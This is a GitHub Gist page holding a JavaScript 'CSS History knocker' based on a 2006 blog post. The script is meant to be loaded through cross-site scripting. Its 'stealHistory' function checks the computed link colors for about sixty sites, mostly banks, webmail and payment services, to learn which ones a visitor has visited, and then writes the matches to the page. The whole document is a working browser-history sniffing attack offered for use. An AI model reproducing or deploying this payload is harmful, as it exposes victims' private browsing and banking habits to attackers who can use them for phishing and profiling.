Last active
December 28, 2015 05:39
-
-
Save korczis/7451653 to your computer and use it in GitHub Desktop.
CSS History knocker See:
http://jeremiahgrossman.blogspot.cz/2006/08/i-know-where-youve-been.html
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var agent = navigator.userAgent.toLowerCase(); | |
var is_mozilla = (agent.indexOf("mozilla") != -1); | |
// popular websites. Lookup if user has visited any. | |
var websites = [ | |
"http://ajaxian.com/", | |
"http://digg.com/", | |
"http://english.aljazeera.net/HomePage", | |
"http://ha.ckers.org", | |
"http://ha.ckers.org/blog/", | |
"http://jeremiahgrossman.blogspot.com/", | |
"http://login.yahoo.com/", | |
"http://mail.google.com/", | |
"http://mail.yahoo.com/", | |
"http://my.yahoo.com/", | |
"http://reddit.com/", | |
"http://seoblackhat.com", | |
"http://slashdot.org/", | |
"http://techfoolery.com/", | |
"http://weblogs.asp.net/jezell/", | |
"http://www.amazon.com/", | |
"http://www.aol.com/", | |
"http://www.bankofamerica.com/", | |
"http://www.bankone.com/", | |
"http://www.blackhat.com/", | |
"http://www.blogger.com/", | |
"http://www.bloglines.com/", | |
"http://www.bofa.com/", | |
"http://www.capitalone.com/", | |
"http://www.cenzic.com", | |
"http://www.cgisecurity.com", | |
"http://www.chase.com/", | |
"http://www.citibank.com/", | |
"http://www.cnn.com/", | |
"http://www.comerica.com/", | |
"http://www.e-gold.com/", | |
"http://www.ebay.com/", | |
"http://www.etrade.com/", | |
"http://www.expedia.com/", | |
"http://www.google.com/", | |
"http://www.hsbc.com/", | |
"http://www.icq.com/", | |
"http://www.jailbabes.com", | |
"http://www.microsoft.com/", | |
"http://www.msn.com/", | |
"http://www.myspace.com/", | |
"http://www.ntobjectives.com", | |
"http://www.passport.net/", | |
"http://www.paypal.com/", | |
"http://www.sourceforge.net/", | |
"http://www.spidynamics.com", | |
"http://www.statefarm.com/", | |
"http://www.usbank.com/", | |
"http://www.wachovia.com/", | |
"http://www.wamu.com/", | |
"http://www.watchfire.com", | |
"http://www.webappsec.org", | |
"http://www.wellsfargo.com/", | |
"http://www.whitehatsec.com", | |
"http://www.xanga.com/", | |
"http://www.yahoo.com/", | |
"http://seoblackhat.com/", | |
"http://www.alexa.com/", | |
"http://www.youtube.com/", | |
"https://banking.wellsfargo.com/", | |
"https://commerce.blackhat.com/", | |
"https://online.wellsfargo.com/", | |
]; | |
/* prevent multiple XSS loads */ | |
if (! document.getElementById('xss_flag')) { | |
var d = document.createElement('div'); | |
d.id = 'xss_flag'; | |
document.body.appendChild(d); | |
var d = document.createElement('table'); | |
d.border = 0; | |
d.cellpadding = 5; | |
d.cellspacing = 10; | |
d.width = '90%'; | |
d.align = 'center'; | |
d.id = 'data'; | |
document.body.appendChild(d); | |
/* launch steal history */ | |
if (is_mozilla) { | |
stealHistory(); | |
} | |
function stealHistory() { | |
// loop through websites and check which ones have been visited | |
for (var i = 0; i < websites.length; i++) { | |
var link = document.createElement("a"); | |
link.id = "id" + i; | |
link.href = websites[i]; | |
link.innerHTML = websites[i]; | |
document.body.appendChild(link); | |
var color = document.defaultView.getComputedStyle(link,null).getPropertyValue("color"); | |
document.body.removeChild(link); | |
// check for visited | |
if (color == "rgb(0, 0, 255)") { | |
document.write('' + websites[i] + ''); | |
} // end visited check | |
} // end visited website loop | |
} // end stealHistory method |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment